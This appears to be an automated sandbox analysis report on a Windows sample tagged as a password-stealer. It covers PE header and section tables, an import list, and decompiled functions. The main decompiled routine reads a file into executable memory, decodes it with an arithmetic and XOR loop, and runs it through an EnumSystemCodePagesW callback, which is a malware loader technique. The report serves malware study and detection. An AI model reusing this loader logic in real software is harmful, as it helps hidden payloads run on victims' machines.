IMAGE_DIRECTORY_ENTRY_IMPORT	0x21788	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29000	0x1a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a000	0x14c4	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c560	0xc0	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x21c1c	0x37c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1a0d0	0x1a200	False	0.4765998803827751	data	6.254058720378555	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x1c000	0x7424	0x7600	False	0.4095272775423729	Matlab v4 mat-file (little endian) , numeric, rows 0, columns 4309148	4.9666568554916495	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x24000	0x258c	0xa00	False	0.16171875	data	2.098226797581286	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.00cfg	0x27000	0x8	0x200	False	0.03125	data	0.06116285224115448	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.voltbl	0x28000	0x22	0x200	False	0.091796875	data	0.6504699138522845
.rsrc	0x29000	0x1a8	0x200	False	0.486328125	data	4.183569951400347	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a000	0x14c4	0x1600	False	0.7718394886363636	data	6.426785687436811	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x29060	0x143	XML 1.0 document, ASCII text	English	United States

Imports

DLL	Import
SHLWAPI.dll	GetMenuPosFromID, PathRemoveExtensionA, SHRegQueryUSValueW, StrRChrW, UrlEscapeA
ole32.dll	CreateClassMoniker, EnableHookObject, HMETAFILE_UserUnmarshal, OleInitialize, StgCreateStorageEx, WriteStringStream
MSWSOCK.dll	GetTypeByNameW, TransmitFile, getnetbyname
WINMM.dll	joyGetNumDevs, midiStreamPosition, midiStreamRestart, mixerClose, mixerGetLineControlsW
pdh.dll	PdhConnectMachineA, PdhGetDefaultPerfCounterA, PdhRemoveCounter, PdhVbGetCounterPathElements, PdhVbGetOneCounterPath, PdhVbOpenQuery
OLEAUT32.dll	OleLoadPictureEx, VARIANT_UserMarshal, VarDateFromCy, VarR8Pow, VarUI2FromDate
CRYPT32.dll	CertDuplicateStore, CertFindRDNAttr, CertFreeCertificateContext, CryptMsgCountersign
RPCRT4.dll	NdrByteCountPointerBufferSize, NdrClientInitializeNew, NdrUserMarshalUnmarshall, RpcBindingInqAuthInfoW, RpcBindingSetOption, RpcMgmtEnableIdleCleanup, RpcMgmtInqComTimeout
KERNEL32.dll	CloseHandle, CreateEventW, CreateFileW, CreateThread, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemCodePagesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileType, GetLastError, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GlobalAlloc, GlobalLock, GlobalReAlloc, GlobalSize, GlobalUnlock, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MulDiv, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadFile, RtlUnwind, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, WaitForMultipleObjects, WideCharToMultiByte, WriteConsoleW, WriteFile, lstrcmpW, lstrcpyW, lstrlenW
USER32.dll	AdjustWindowRect, BeginPaint, CharLowerBuffW, CharUpperBuffW, ClientToScreen, CloseClipboard, CreateCaret, CreateMenu, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DestroyCaret, DispatchMessageW, EmptyClipboard, EnableMenuItem, EndPaint, FillRect, GetCapture, GetClientRect, GetClipboardData, GetDC, GetDlgItem, GetDpiForSystem, GetFocus, GetKeyboardState, GetParent, GetSystemMenu, GetSystemMetrics, GetWindowLongW, HideCaret, InsertMenuW, InvalidateRect, InvertRect, IsClipboardFormatAvailable, IsWindowVisible, LoadCursorW, LoadIconW, LoadStringW, MapVirtualKeyW, MsgWaitForMultipleObjects, OpenClipboard, PeekMessageW, PostMessageW, PostQuitMessage, RegisterClassW, ReleaseCapture, ReleaseDC, ScrollWindow, SetCapture, SetCaretPos, SetClipboardData, SetRect, SetScrollPos, SetScrollRange, SetTimer, SetWindowLongW, SetWindowPos, SetWindowTextW, ShowCaret, ShowScrollBar, ShowWindow, SystemParametersInfoW, ToUnicode, TrackPopupMenu, UpdateWindow, VkKeyScanW, wsprintfW
GDI32.dll	BitBlt, CreateBitmap, CreateCompatibleBitmap, CreateCompatibleDC, CreateFontIndirectW, CreateSolidBrush, DeleteObject, EnumFontFamiliesExW, GetStockObject, GetTextFaceW, GetTextMetricsW, LineTo, MoveToEx, SelectObject, SetBkColor, SetTextColor, TextOutW, TranslateCharsetInfo
COMCTL32.dll
ADVAPI32.dll	RegCloseKey, RegCreateKeyW, RegSetValueExW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Statistics

High Level Behavior Distribution

Click to dive into process behavior distribution

Disassembly

Reset < >

Analysis Process: SecuriteInfo.com.Win32.PWSX-gen.16188.7094.exePID: 5640, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	1.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	8.1%
Total number of Nodes:	1382
Total number of Limit Nodes:	17

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E001A18D0(void* __eflags, void* _a4, void* _a8, WCHAR* _a12, void* _a16) {
				struct _OVERLAPPED* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				struct _OVERLAPPED* _v32;
				signed short* _v36;
				void* _v40;
				void* _v44;
				long _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				struct _OVERLAPPED* _v64;
				signed int _v68;
				long _v72;
				struct _OVERLAPPED* _v76;
				signed short _v96;
				signed int _v100;
				signed int _v132;
				char _v144;
				signed int _v148;
				void* _v152;
				void* _v156;
				void* _v160;
				void* _v164;
				signed int _v168;
				signed int _v172;
				long _v176;
				void* __edi;
				struct _OVERLAPPED* _t228;
				void* _t236;
				int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t262;
				signed int _t264;
				signed int _t267;
				void* _t279;
				void* _t280;
				signed int _t284;
				signed int _t287;
				signed int _t290;
				signed int _t293;
				signed int _t296;
				signed int _t299;
				signed int _t302;
				signed int _t304;
				signed int _t312;
				signed int _t318;
				signed int _t325;
				intOrPtr _t350;
				void* _t399;
				void* _t402;
				void* _t406;
				signed int* _t407;
				signed int* _t408;
				intOrPtr* _t409;
				signed int* _t410;
				intOrPtr* _t411;
				signed int* _t412;
				intOrPtr* _t414;

				_v16 = 0;
				_v20 = 0;
				_v24 = 0;
				_v28 = 0;
				_v32 = 0;
				_v52 = 2;
				_v64 = 0;
				_v68 = 0;
				_v76 = 0;
				_v176 = 0x3d0900; // executed
				_t228 = E001B0FD1(); // executed
				_v76 = _t228;
				if(_v76 != 0) {
					E001AFC30(_t399, _v76, 0x54, 0x3d0900);
					_v44 = CreateFileW(_a12, 0x80000000, 1, 0, 3, 0x80, 0);
					_v48 = GetFileSize(_v44, 0);
					_t236 = VirtualAlloc(0, _v48, 0x3000, 0x40); // executed
					_v40 = _t236;
					__eflags = 0;
					ReadFile(_v44, _v40, _v48,  &_v72, 0); // executed
					_t406 = _t402 - 0xfffffffffffffff0;
					while(1) {
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x1d;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 1;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0x17;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xc4;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x00000071;
						 *(_v40 + _v68) =  *(_v40 + _v68) ^ 0x000000fc;
						 *(_v40 + _v68) =  *(_v40 + _v68) - 0xe;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0xff;
						 *(_v40 + _v68) =  *(_v40 + _v68) + 0x44;
						_v68 = _v68 + 1;
						__eflags = _v68 - _v48;
						if(_v68 >= _v48) {
							break;
						}
					}
					__eflags = 0;
					_v176 = _v40;
					_v172 = 0;
					EnumSystemCodePagesW(??, ??);
					_t407 = _t406 - 8;
					 *_t407 = _v76;
					E001B0F4D();
					_v68 = 0;
					while(1) {
						__eflags = _v68 - _v52;
						if(_v68 >= _v52) {
							break;
						}
						 *0x1c4918 = 0x1f7;
						_v68 = _v68 + 1;
					}
					_t257 = GetOEMCP();
					 *0x1c49b8 = _t257;
					 *0x1c49b4 = _t257;
					 *0x1c49a4 = 0x32;
					_t258 =  *0x1c49a4; // 0x0
					 *_t407 = _t258;
					_v176 = 4;
					_t259 = E001B0F42();
					 *0x1c49a0 = _t259;
					__eflags = _t259;
					if(_t259 != 0) {
						_v68 = 1;
						while(1) {
							__eflags = _v68 - _v52;
							if(_v68 >= _v52) {
								break;
							}
							 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
							_v176 = L"--headless";
							_t287 = E001B11B7();
							__eflags = _t287;
							if(_t287 != 0) {
								 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
								_v176 = L"--unix";
								_t290 = E001B11B7();
								__eflags = _t290;
								if(_t290 != 0) {
									 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
									_v176 = L"--width";
									_t293 = E001B11B7();
									__eflags = _t293;
									if(_t293 != 0) {
										 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
										_v176 = L"--height";
										_t296 = E001B11B7();
										__eflags = _t296;
										if(_t296 != 0) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 = L"--signal";
											_t299 = E001B11B7();
											__eflags = _t299;
											if(_t299 != 0) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 = L"--server";
												_t302 = E001B11B7();
												__eflags = _t302;
												if(_t302 != 0) {
													_v16 = 1;
												} else {
													_t304 = _v68 + 1;
													_v68 = _t304;
													__eflags = _t304 - _v52;
													if(_t304 != _v52) {
														 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
														_v176 =  &_v36;
														_v172 = 0;
														 *0x1c4914 = E001B1341();
														__eflags =  *_v36;
														if( *_v36 == 0) {
															goto L47;
														} else {
															_v16 = 1;
														}
													} else {
														_v16 = 1;
													}
												}
											} else {
												_t312 = _v68 + 1;
												_v68 = _t312;
												__eflags = _t312 - _v52;
												if(_t312 != _v52) {
													 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
													_v176 =  &_v36;
													_v172 = 0;
													_v32 = E001B1341();
													__eflags =  *_v36;
													if( *_v36 == 0) {
														goto L47;
													} else {
														_v16 = 1;
													}
												} else {
													_v16 = 1;
												}
											}
										} else {
											_t318 = _v68 + 1;
											_v68 = _t318;
											__eflags = _t318 - _v52;
											if(_t318 != _v52) {
												 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
												_v176 =  &_v36;
												_v172 = 0;
												_v28 = E001B1341();
												__eflags = _v28;
												if(_v28 != 0) {
													L30:
													__eflags = _v28 - 0xffff;
													if(_v28 > 0xffff) {
														goto L32;
													} else {
														__eflags =  *_v36 & 0x0000ffff;
														if(( *_v36 & 0x0000ffff) == 0) {
															goto L47;
														} else {
															goto L32;
														}
													}
												} else {
													__eflags =  *0x1c4920;
													if( *0x1c4920 == 0) {
														L32:
														_v16 = 1;
													} else {
														goto L30;
													}
												}
											} else {
												_v16 = 1;
											}
										}
									} else {
										_t325 = _v68 + 1;
										_v68 = _t325;
										__eflags = _t325 - _v52;
										if(_t325 != _v52) {
											 *_t407 =  *(_v56 + _v68 * 2) & 0x0000ffff;
											_v176 =  &_v36;
											_v172 = 0;
											_v24 = E001B1341();
											__eflags = _v24;
											if(_v24 != 0) {
												L21:
												__eflags = _v24 - 0xffff;
												if(_v24 > 0xffff) {
													goto L23;
												} else {
													__eflags =  *_v36 & 0x0000ffff;
													if(( *_v36 & 0x0000ffff) == 0) {
														goto L47;
													} else {
														goto L23;
													}
												}
											} else {
												__eflags =  *0x1c4920;
												if( *0x1c4920 == 0) {
													L23:
													_v16 = 1;
												} else {
													goto L21;
												}
											}
										} else {
											_v16 = 1;
										}
									}
								} else {
									 *0x1c4920 = 1;
									 *0x1c4924 = 1;
									_v20 = 1;
									goto L47;
								}
							} else {
								_v20 = 1;
								L47:
								_v68 = _v68 + 1;
								continue;
							}
							goto L72;
						}
						__eflags =  *0x1c4914;
						if( *0x1c4914 != 0) {
							__eflags = _v24;
							if(_v24 == 0) {
								_v24 = 0x50;
							}
							__eflags = _v28;
							if(__eflags == 0) {
								_v28 = 0x96;
							}
							 *_t407 = 0x1c4914;
							_v176 = 1;
							_v172 = _v24;
							_v168 = _v28;
							_t262 = E001A2080(__eflags);
							_t408 = _t407 - 0x10;
							 *0x1c491c = _t262;
							__eflags = _t262;
							if(_t262 != 0) {
								__eflags = _v20;
								if(_v20 == 0) {
									 *_t408 = 0x1c4914;
									_t264 = E001A23E0(0);
									_t409 = _t408 - 4;
									__eflags = _t264;
									if(_t264 != 0) {
										 *_t409 =  &_v144;
										GetStartupInfoW(??);
										_t410 = _t409 - 4;
										 *_t410 = _v132;
										_t267 = E001B1219();
										 *_t410 = 0x1c4914;
										_v176 = _v132;
										_v172 = _t267 << 1;
										E001A2750();
										_t411 = _t410 - 0xc;
										__eflags = _v100 & 0x00000001;
										if((_v100 & 0x00000001) == 0) {
											_v148 = 5;
										} else {
											_v148 = _v96 & 0x0000ffff;
										}
										_t350 =  *0x1c49bc; // 0x0
										 *_t411 = _t350;
										_v176 = _v148;
										ShowWindow(??, ??);
										_t412 = _t411 - 8;
										goto L71;
									} else {
										_v16 = 1;
									}
								} else {
									 *_t408 = 0xfffffff6;
									_t279 = GetStdHandle(??);
									_t414 = _t408 - 4;
									 *0x1c49c4 = _t279;
									 *_t414 = 0xfffffff5;
									_t280 = GetStdHandle(??);
									_t412 = _t414 - 4;
									 *0x1c49c8 = _t280;
									__eflags =  *0x1c49c4;
									if( *0x1c49c4 != 0) {
										L59:
										 *_t412 = 0x1c4914;
										E001A22B0();
										_t412 = _t412 - 4;
										__eflags =  *0x1c4920;
										if( *0x1c4920 != 0) {
											L62:
											goto L64;
										} else {
											 *_t412 = 0x1c4914;
											_t284 = E001A2340();
											_t412 = _t412 - 4;
											__eflags = _t284;
											if(_t284 != 0) {
												goto L62;
											} else {
												_v16 = 1;
											}
										}
									} else {
										__eflags =  *0x1c49c8;
										if( *0x1c49c8 == 0) {
											 *0x1c4928 = 1;
											L64:
											L71:
											 *_t412 = 0x1c4914;
											_v176 = _v32;
											_v16 = E001A2980();
										} else {
											goto L59;
										}
									}
								}
							} else {
								_v16 = 1;
							}
						} else {
							_v16 = 1;
						}
					} else {
						_v16 = 1;
					}
				} else {
					_v16 = 0;
				}
				L72:
				return _v16;
			}

0x001a18e7
0x001a18ee
0x001a18f5
0x001a18fc
0x001a1903
0x001a190a
0x001a1911
0x001a1918
0x001a191f
0x001a1926
0x001a192d
0x001a1932
0x001a1939
0x001a1961
0x001a19a7
0x001a19c3
0x001a19e6
0x001a19ef
0x001a19fe
0x001a1a17
0x001a1a1d
0x001a1a20
0x001a1a2d
0x001a1a3c
0x001a1a4c
0x001a1a5b
0x001a1a6e
0x001a1a7e
0x001a1a91
0x001a1aa1
0x001a1ab0
0x001a1ac0
0x001a1ac9
0x001a1acf
0x001a1ad2
0x00000000
0x00000000
0x001a1ad8
0x001a1ae0
0x001a1ae2
0x001a1ae5
0x001a1aed
0x001a1af3
0x001a1af9
0x001a1afc
0x001a1b01
0x001a1b08
0x001a1b0b
0x001a1b0e
0x00000000
0x00000000
0x001a1b14
0x001a1b24
0x001a1b24
0x001a1b2c
0x001a1b32
0x001a1b37
0x001a1b3c
0x001a1b46
0x001a1b4b
0x001a1b4e
0x001a1b56
0x001a1b5b
0x001a1b60
0x001a1b63
0x001a1b75
0x001a1b7c
0x001a1b7f
0x001a1b82
0x00000000
0x00000000
0x001a1b98
0x001a1b9b
0x001a1b9f
0x001a1ba4
0x001a1ba7
0x001a1bc9
0x001a1bcc
0x001a1bd0
0x001a1bd5
0x001a1bd8
0x001a1c0e
0x001a1c11
0x001a1c15
0x001a1c1a
0x001a1c1d
0x001a1cbb
0x001a1cbe
0x001a1cc2
0x001a1cc7
0x001a1cca
0x001a1d68
0x001a1d6b
0x001a1d6f
0x001a1d74
0x001a1d77
0x001a1def
0x001a1df2
0x001a1df6
0x001a1dfb
0x001a1dfe
0x001a1e68
0x001a1e04
0x001a1e07
0x001a1e0a
0x001a1e0d
0x001a1e10
0x001a1e31
0x001a1e34
0x001a1e38
0x001a1e45
0x001a1e4d
0x001a1e51
0x00000000
0x001a1e57
0x001a1e57
0x001a1e57
0x001a1e16
0x001a1e16
0x001a1e16
0x001a1e10
0x001a1d7d
0x001a1d80
0x001a1d83
0x001a1d86
0x001a1d89
0x001a1daa
0x001a1dad
0x001a1db1
0x001a1dbe
0x001a1dc4
0x001a1dc8
0x00000000
0x001a1dce
0x001a1dce
0x001a1dce
0x001a1d8f
0x001a1d8f
0x001a1d8f
0x001a1d89
0x001a1cd0
0x001a1cd3
0x001a1cd6
0x001a1cd9
0x001a1cdc
0x001a1cfd
0x001a1d00
0x001a1d04
0x001a1d11
0x001a1d14
0x001a1d18
0x001a1d2b
0x001a1d2b
0x001a1d32
0x00000000
0x001a1d38
0x001a1d3e
0x001a1d41
0x00000000
0x00000000
0x00000000
0x00000000
0x001a1d41
0x001a1d1e
0x001a1d1e
0x001a1d25
0x001a1d47
0x001a1d47
0x00000000
0x00000000
0x00000000
0x001a1d25
0x001a1ce2
0x001a1ce2
0x001a1ce2
0x001a1cdc
0x001a1c23
0x001a1c26
0x001a1c29
0x001a1c2c
0x001a1c2f
0x001a1c50
0x001a1c53
0x001a1c57
0x001a1c64
0x001a1c67
0x001a1c6b
0x001a1c7e
0x001a1c7e
0x001a1c85
0x00000000
0x001a1c8b
0x001a1c91
0x001a1c94
0x00000000
0x00000000
0x00000000
0x00000000
0x001a1c94
0x001a1c71
0x001a1c71
0x001a1c78
0x001a1c9a
0x001a1c9a
0x00000000
0x00000000
0x00000000
0x001a1c78
0x001a1c35
0x001a1c35
0x001a1c35
0x001a1c2f
0x001a1bde
0x001a1bde
0x001a1be8
0x001a1bf2
0x00000000
0x001a1bf2
0x001a1bad
0x001a1bad
0x001a1e74
0x001a1e7a
0x00000000
0x001a1e7a
0x00000000
0x001a1ba7
0x001a1e82
0x001a1e89
0x001a1e9b
0x001a1e9f
0x001a1ea5
0x001a1ea5
0x001a1eac
0x001a1eb0
0x001a1eb6
0x001a1eb6
0x001a1ec9
0x001a1ecc
0x001a1ed4
0x001a1ed8
0x001a1edc
0x001a1ee1
0x001a1ee4
0x001a1ee9
0x001a1eec
0x001a1efe
0x001a1f02
0x001a1faa
0x001a1fad
0x001a1fb2
0x001a1fb5
0x001a1fb8
0x001a1fd0
0x001a1fd3
0x001a1fd9
0x001a1fdf
0x001a1fe2
0x001a1ff3
0x001a1ff6
0x001a1ffa
0x001a1ffe
0x001a2003
0x001a200c
0x001a200f
0x001a2029
0x001a2015
0x001a2019
0x001a2019
0x001a203a
0x001a2040
0x001a2043
0x001a2047
0x001a204d
0x00000000
0x001a1fbe
0x001a1fbe
0x001a1fbe
0x001a1f08
0x001a1f08
0x001a1f0f
0x001a1f15
0x001a1f18
0x001a1f1d
0x001a1f24
0x001a1f2a
0x001a1f2d
0x001a1f32
0x001a1f39
0x001a1f4c
0x001a1f52
0x001a1f55
0x001a1f5a
0x001a1f5d
0x001a1f64
0x001a1f90
0x00000000
0x001a1f6a
0x001a1f70
0x001a1f73
0x001a1f78
0x001a1f7b
0x001a1f7e
0x00000000
0x001a1f84
0x001a1f84
0x001a1f84
0x001a1f7e
0x001a1f3f
0x001a1f3f
0x001a1f46
0x001a1f95
0x001a1f9f
0x001a2050
0x001a2059
0x001a205c
0x001a2068
0x00000000
0x00000000
0x00000000
0x001a1f46
0x001a1f39
0x001a1ef2
0x001a1ef2
0x001a1ef2
0x001a1e8f
0x001a1e8f
0x001a1e8f
0x001a1b69
0x001a1b69
0x001a1b69
0x001a193f
0x001a193f
0x001a193f
0x001a206b
0x001a2077

APIs

CreateFileW.KERNEL32 ref: 001A199E
GetFileSize.KERNEL32 ref: 001A19BA
VirtualAlloc.KERNELBASE ref: 001A19E6
ReadFile.KERNELBASE ref: 001A1A17

Strings

--height, xrefs: 001A1CB5
--headless, xrefs: 001A1B92
--unix, xrefs: 001A1BC3
@, xrefs: 001A19DE
--width, xrefs: 001A1C08
T, xrefs: 001A1951
--server, xrefs: 001A1DE9
P, xrefs: 001A1EA5
--signal, xrefs: 001A1D62

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: File$AllocCreateReadSizeVirtual
String ID: --headless$--height$--server$--signal$--unix$--width$@$P$T
API String ID: 4119528295-967118136
Opcode ID: 36c88cda7d9fbc3df30d66a94949c275ce3f13f12deb75227155ceb9223edc15
Instruction ID: 2139e2bd75bf9222ce9d5304f5d7157e5417a567ef4a8465ef3eda6c34ec8ccb
Opcode Fuzzy Hash: 36c88cda7d9fbc3df30d66a94949c275ce3f13f12deb75227155ceb9223edc15
Instruction Fuzzy Hash: CC2249B8809218DFDB14EFA8C994BAEBBF0FF49304F11841DE845AB291D7749985CF12

Uniqueness

Uniqueness Score: -1.00%

Function 001AD720 Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001AD720() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E001AD847); // executed
				return _t1;
			}

0x001ad725
0x001ad72b

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000D847,001AD1A3), ref: 001AD725

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 84b1f90e2a5c7fff7b68d1e2facaa39502e22539816fed6b3f3765ab339bfc50
Instruction ID: bd0aed3192c0b08e5becb67eff93d20a76d4b4cec37685fde3edfac80af7f216
Opcode Fuzzy Hash: 84b1f90e2a5c7fff7b68d1e2facaa39502e22539816fed6b3f3765ab339bfc50
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001B5AE0 Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B5AE0() {
				WCHAR* _t1;
				void* _t3;
				void* _t17;
				WCHAR* _t19;

				_t1 = GetEnvironmentStringsW();
				_t19 = _t1;
				if(_t19 != 0) {
					_t11 = E001B5B2E(_t19) - _t19 & 0xfffffffe;
					_t3 = E001B48CE(E001B5B2E(_t19) - _t19 & 0xfffffffe); // executed
					_t17 = _t3;
					if(_t17 != 0) {
						E001AF6B0(_t17, _t19, _t11);
					}
					E001B36C3(0);
					FreeEnvironmentStringsW(_t19);
					return _t17;
				} else {
					return _t1;
				}
			}

0x001b5ae3
0x001b5ae9
0x001b5aed
0x001b5afd
0x001b5b01
0x001b5b06
0x001b5b0c
0x001b5b11
0x001b5b16
0x001b5b1b
0x001b5b22
0x001b5b2d
0x001b5af0
0x001b5af0
0x001b5af0

APIs

GetEnvironmentStringsW.KERNEL32(?,001B0B46), ref: 001B5AE3
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,001B0B46), ref: 001B5B22

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 050eb4e87e5df8cf453bed8cce2823a555da305d8f00015f75d5dcb380d3121d
Instruction ID: 40facae70881f0cedbdff4d165992725779064c63e96263a1f7b11b3d09f81fd
Opcode Fuzzy Hash: 050eb4e87e5df8cf453bed8cce2823a555da305d8f00015f75d5dcb380d3121d
Instruction Fuzzy Hash: 58E0922B649A2137932133B97C89EEB1E1ECFD27757250225F41596287EF148D8240F5

Uniqueness

Uniqueness Score: -1.00%

Function 001B4871 Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E001B4871(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x1c62dc, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E001B0EFD();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E001B47E4())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E001B39FF(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x001b4877
0x001b487c
0x001b488a
0x001b488a
0x001b4890
0x001b4892
0x001b4892
0x001b48a9
0x001b48b2
0x001b48ba
0x00000000
0x00000000
0x001b489a
0x001b489c
0x001b48be
0x001b48c3
0x001b48c9
0x00000000
0x001b48c9
0x001b489f
0x001b48a5
0x001b48a7
0x00000000
0x00000000
0x001b48a7
0x00000000
0x001b48a9
0x001b4882
0x001b4888
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001B278A,00000001,00000364,00000000,00000007,000000FF,?,?,001B47E9,001B36F8), ref: 001B48B2

Memory Dump Source

Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
